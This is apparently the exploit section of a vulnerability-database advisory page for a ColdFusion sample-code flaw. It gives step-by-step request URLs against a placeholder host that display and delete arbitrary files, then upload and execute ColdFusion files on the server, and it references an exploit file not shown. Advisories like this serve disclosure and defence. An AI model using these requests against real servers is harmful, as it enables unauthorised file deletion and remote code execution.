• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Allaire ColdFusion Remote File Display, Deletion, Upload and Execution Vulnerability

To display and delete any file on the system use an URL of the following form:

http://www.victim.test/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\the\target\file

To upload files to the sever first find out the location of the sample code on the server by uploading a dummy file by using http://www.victim.test/cfdocs/expeval/openfile.cfm. After uploading a dummy file it will be displayed for you. The URL will be for the form:

http://www.victim.test/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\dummy.txt

Now replace the "dummy.txt" string by "ExprCalc.cfm" to delete that file. We can now upload and execute ColdFusion files in the server without them being deleted.

• /data/vulnerabilities/exploits/mole.cfm